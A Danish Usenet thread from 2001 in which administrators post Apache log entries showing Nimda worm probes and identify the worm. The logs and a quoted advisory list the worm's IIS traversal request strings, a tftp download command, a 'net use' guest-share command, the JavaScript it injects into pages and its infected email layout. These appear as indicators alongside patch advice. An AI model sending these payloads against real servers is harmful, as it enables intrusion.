---

Jeg har netop fanget de to flg. angreb i min apache log.

Jeg har ikke set noget sådant før, så jeg spekulerer på, om det er en
ny orm eller "bare" en orm, der benytter sig af de huller som CodeRed
efterlod sig.

Jeg undrer mig også over, at jeg pludseligt får to angreb indenfor
få minutter.

Shit. Mens jeg skriver dette har jeg fået to til !

-Claus



212.140.174.125 - - [18/Sep/2001:15:42:59 +0200]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:02 +0200]
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:03 +0200]
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:14 +0200]
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:20 +0200]
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 309 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:25 +0200]
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 326 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:27 +0200]
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 326 "-" "-"
212.140.174.125 - - [18/Sep/2001:15:43:30 +0200]
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"

212.210.15.230 - - [18/Sep/2001:15:48:01 +0200]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:01 +0200]
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:01 +0200]
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:01 +0200]
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:02 +0200]
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 309 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:02 +0200]
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 326 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:02 +0200]
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 326 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:02 +0200]
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:03 +0200]
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 308 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:03 +0200]
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 308 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:03 +0200]
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 308 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:04 +0200]
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 308 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:04 +0200]
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400 292 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:04 +0200]
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400 292 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:04 +0200]
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 309 "-" "-"
212.210.15.230 - - [18/Sep/2001:15:48:05 +0200]
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 309 "-" "-"

---

Claus Rasmussen <clr@cc-consult.dk> writes:

> Jeg har netop fanget de to flg. angreb i min apache log.
>
> Jeg har ikke set noget sådant før, så jeg spekulerer på, om det er en
> ny orm eller "bare" en orm, der benytter sig af de huller som CodeRed
> efterlod sig.
>
> Jeg undrer mig også over, at jeg pludseligt får to angreb indenfor
> få minutter.
>
> Shit. Mens jeg skriver dette har jeg fået to til !

De vælter også ind her i rå mængder.

Det ligner ret meget en orm af en slags.

> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:42:59 +0200]
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:02 +0200]
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:03 +0200]
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:14 +0200]
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:20 +0200]
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 309 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:25 +0200]
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 326 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:27 +0200]
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 326 "-" "-"
> xxx.xxx.xxx.xxx - - [18/Sep/2001:15:43:30 +0200]
> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
> ..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"

--
Med venlig hilsen
Christian Laursen

---

Christian Laursen skrev:

>> Shit. Mens jeg skriver dette har jeg fået to til !
>
> De vælter også ind her i rå mængder.

Osse hos mig, de er startet her i eftermiddags.

Er det mon en ny variant af CodeRed?


// Klaus

--
><>°    vandag, môre, altyd saam

---

Klaus Alexander Seistrup wrote:

> Er det mon en ny variant af CodeRed?

Eller også er det en ny super-orm (ala Ramen). Jeg er bestemt ikke
nogen Windows haj, men så vidt jeg kan se, prøver den adskillige
ting for at cracke maskinen.

Det kunne være interessant at se, om de huller, som ormen prøver
at benytte sig af, er skabt af een af de tidlige CodeRed orme. De
efterlod sig, så vidt jeg ved, en række huller til senere brug.

-Claus

---

Claus Rasmussen skrev:

>> Er det mon en ny variant af CodeRed?
>
> Eller også er det en ny super-orm (ala Ramen).

Se <http://slashdot.org/article.pl?sid=01/09/18/151203>.


// Klaus

--
><>°    vandag, môre, altyd saam

---

Claus Rasmussen wrote:

[...]

Jeg har en side, hvor man kan se udviklingen af CodeRed version I, II
og III. Den findes på www.cc-consult.dk/CodeRed/plot.html incl. source.

-Claus

---

Claus Rasmussen wrote:

> Jeg har en side, hvor man kan se udviklingen af CodeRed version I, II
> og III. Den findes på www.cc-consult.dk/CodeRed/plot.html incl. source.

Jeg har efter at have kigget lidt i mine logs fundet ud af, at det nok
ville være en god ide med en statistik pr. time. Den kan findes på
http://www.cc-consult.dk/Worm/plot.html incl. source.

-Claus

---

Claus Rasmussen wrote:
>
> Jeg har netop fanget de to flg. angreb i min apache log.
>
> Jeg har ikke set noget sådant før, så jeg spekulerer på, om det er en
> ny orm eller "bare" en orm, der benytter sig af de huller som CodeRed
> efterlod sig.
[snip]

her er lidt fra dk.edb.sikkerhed
###########################################

Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?

W32.Nimda.worm er en høj risiko virus der spreder sig ved at udnytte en
sårbarhed i Outlook/IE (IFrame ) og adskillige andre som omfatter IIS.
Denne
orm er krydsinficerende og udnytter stort set samtlige kendte
sårbarheder,
som kan afvikle (remotely) kode på Microsoft IIS 4.0 og 5.0 (den laver
alle
tænke GET kommandoer). Derudover spreder den sig fra inficerede
hjemmesider
via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
interaktion fra brugeren hvis maskinen ikke er opdateret eller
understøtter
active scripting. Ormen tilføjer følgende streng til hjemmesider som
kompromitteres: "<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede
nu
adskillige hundrede danske hjemmesider.

Inficerede PC'ere og servere scanner efter infektion efter andre
systemer
der kan infiltreres ved at udnytte gamle og nye sårbarheder. Her findes
en
liste over de kald som ormen laver mod andre hosts i håb om at finde en
sårbar IIS-server.

tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..

Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre
kilder
end den indlysende signatur.

Fra private PC'ere sender den sig selv videre til samtlige fortegnelser
i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den
lokale
administrator gruppe. På hver enkelt delt mappe den finder droppes
følgende
filer: sample.nws, sample.eml, desktop.eml, desktop.nws.

Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.

Ormen syntes, at være primært bærende via email hvor den automatisk
afvikles
hvis den vises i "preview pane" i Outlook/OE på en maskine som ikke er
opdateret med patch fra Microsoft..En inficeret email vil (den kan også
være
blank i emne og indhold men vil altid anvende samme filnavn) ankomme med
følgende header:

Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

For at udgå at blive inficeret af denne orm kan man deaktivere aktive
scripting. Det kan gøres på følgende måde:

Højreklik på IE ikonet, vælg egenskaber, klik på fanebladet sikkerhed og
herunder brugerdefineret niveau. Gå ned på listen og deaktiver aktive
scripting.
Alle som administrerer en IIS server skal snarest opdatere med en
samling af
patches, som er frigivet af Microsoft og som kan hentes på følgende
adresse:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Yderligere informationer om den sårbarhed, som ormen anvender til at
sprede
sig via email og fra kompromitterede hjemmesider kan findes hos Georgi
Guninski på adressen: http://www.guninski.com/frame2-desc.html

--
http://www.schulz.dk - En nørds bekendelser!
Nørdesnak, attitude og alverdens usexede nyheder for nørder

---

Claus Rasmussen wrote:
>
> Jeg undrer mig også over, at jeg pludseligt får to angreb indenfor
> få minutter.
>
> Shit. Mens jeg skriver dette har jeg fået to til !

Det er Nimda, en Win32 orm, der både inficere IIS servere og klient
maskiner med IE/OE (og brugere uden omtanke).

Siden i går kl. 15:35 har jeg fået godt og vel 2000 forespørgsler af
denne type :(

Læs evt. mere her <URL: http://www.csirt.dk>

(og giv gerne dine venner, med Windows, et praj ;))


--
Med venlig hilsen
Michael Rasmussen

---

"Michael Rasmussen" <michael@chatroom-dansk.dk> skrev i en meddelelse
news:3BA850BF.14FD25A3@chatroom-

> Det er Nimda, en Win32 orm, der både inficere IIS servere og klient
> maskiner med IE/OE (og brugere uden omtanke).

IE 5.5 sp2 skulle rette problemet


--
|-|$235-|)k - Mickey - Eko sum lapis
http://susie.dk/coderedworm.html